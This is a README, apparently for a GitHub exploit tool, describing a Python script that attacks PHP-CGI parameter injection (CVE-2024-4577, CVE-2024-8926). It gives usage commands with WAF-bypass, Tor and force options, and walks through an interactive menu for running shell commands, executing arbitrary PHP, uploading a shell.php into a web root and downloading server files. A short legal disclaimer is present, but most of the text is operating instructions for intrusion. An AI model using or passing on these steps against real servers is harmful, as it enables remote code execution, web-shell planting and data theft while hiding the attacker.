
Una herramienta de penetración de seguridad para probar CVE-2024-4577 y CVE-2024-8926.
🚀 CVE-2024-4577 y CVE-2024-8926 Herramienta de Exploit
Herramienta de pruebas automatizadas para la vulnerabilidad de inyección de parámetros PHP-CGI, compatible con CVE-2024-4577 y CVE-2024-8926, que permite realizar ejecución de comandos, subida y descarga de archivos, entre otras operaciones.
Esta herramienta se puede utilizar para probar la vulnerabilidad de inyección de parámetros en entornos PHP-CGI y ofrece:
Esta herramienta está restringida a pruebas legales y fines académicos. ¡No la uses en sistemas no autorizados!
⚠️ ¡El uso ilegal conlleva responsabilidades legales!
Esta herramienta está destinada únicamente a:
Esta herramienta depende de los siguientes paquetes de Python; por favor, instálalos primero:
pip install -r requirements.txt
O puedes instalarlos manualmente:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Ejemplos:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
Cuando el script encuentra una vulnerabilidad, mostrará el siguiente menú:
╭──────────── Exploit 模式選單 ────────────╮
│ 當前目標:http://example.com/ │
│ 當前注入點:/php-cgi/php-cgi.exe │
│ 漏洞編號:CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 Shell模式
2) 🛠️ PHP自訂端模式
3) 📤 上傳檔案
4) 📥 下載檔案
5) 🎯 切換攻擊目標
6) ⚙️ 設定參數
7) ❌ 離開程式
>>
Ejecuta comandos del sistema:
shell> whoami
📂 Guardar salida
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Ejecuta código PHP personalizado:
phpinfo();
EOF
📂 Guardar salida
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
本地檔案路徑:C:\test\shell.php
目標完整路徑:
[*] 已自動設定上傳路徑為: C:/xampp/htdocs/shell.php
📂 Especificar la ruta manualmente
目標完整路徑:C:\xampp\php\shell.php
遠端檔案路徑:C:\xampp\htdocs\index.php
📂 Después de la descarga, el archivo se guarda en download/; si ya existe, se le añade un número automáticamente
[*] 檔案下載完成,儲存在 download/index.php
輸入新目標URL: http://newtarget.com
🔹 Volverá a probar la vulnerabilidad
[⚙️ 利用階段參數設定選單]
1) 切換荷載 Payload 1
2) 繞過模組 Bypass 未選擇
3) 等待時間 Timeout 10 秒
4) 請求延遲 Delay 0 秒
5) 自動紀錄 Log 關閉
6) 詳細模式 Verbose 關閉
7) 動畫效果 Effects 開啟
8) 強制利用 Force 關閉
9) 儲存並返回 Exploit 選單
Se ofrecen las siguientes estrategias de bypass:
php://input por otras notaciones| Parámetro | Descripción | Ejemplo |
|---|
-u o --url | Especifica la URL objetivo | -u http://example.com |
--timeout sec | Establece el tiempo de espera de la solicitud (0 es infinito) | --timeout 30 |
--log | Registra automáticamente los comandos de shell | --log |
--payload | Especifica o personaliza la combinación de payload | --payload 2 |
--tor | Envía solicitudes a través de Tor | --tor |
--verbose | Muestra información detallada | --verbose |
--bypass | Activa el modo de bypass WAF | --bypass |
--force | Fuerza la entrada al modo de explotación | --force |
--cgipoint PATHS | Especifica rutas CGI concretas para las pruebas | --cgipoint /path |
--delay sec | Segundos de retardo entre cada solicitud | --delay 1.5 |
--no-effects | Desactiva todos los efectos de animación y retardo | --no-effects |